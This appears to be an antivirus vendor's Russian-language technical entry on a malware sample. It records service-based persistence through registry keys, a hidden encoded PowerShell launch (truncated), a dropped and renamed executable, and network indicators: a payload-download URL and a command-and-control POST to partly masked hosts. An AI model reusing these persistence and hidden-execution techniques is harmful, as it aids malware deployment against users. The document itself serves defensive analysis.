Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\panoremote] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\panoremote] 'ImagePath' = '"%WINDIR%\SysWOW64\panoremote.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABTAHcAawB6AHUAbAB0AHUAZAB0AHoAaQA9ACcASABlAGEAdgBuAHcAdgBzAHMAJwA7ACQASwBwAG8AbwB0AGIAaABzAHMAIAA9ACAAJwA0ADcAMgAnADsAJABZAGkAawBrAG8AZAB5AG8AcQA9ACcAWAB2AGoAaQBmAGYAbABsAGgAdwBpACcAOwA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\472.exe
Перемещает следующие файлы
- %HOMEPATH%\472.exe в %WINDIR%\syswow64\panoremote.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://to##to.es/wp-admin/8qg88-v69gxquz-5219565/
Запросы HTTP POST
- http://21#.##0.229.161:443/merge/devices/ringin/ via 21#.#10.229.161
UDP
- DNS ASK al####eglobal.com
- DNS ASK na##uch.com
- DNS ASK to##to.es
- DNS ASK ev###.com.sg
- DNS ASK su####vithomes.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\472.exe'
- '%WINDIR%\syswow64\panoremote.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABTAHcAawB6AHUAbAB0AHUAZAB0AHoAaQA9ACcASABlAGEAdgBuAHcAdgBzAHMAJwA7ACQASwBwAG8AbwB0AGIAaABzAHMAIAA9ACAAJwA0ADcAMgAnADsAJABZAGkAawBrAG8AZAB5AG8AcQA9ACcAWAB2AGoAaQBmAGYAbABsAGgAdwBpACcAOwA...' (со скрытым окном)
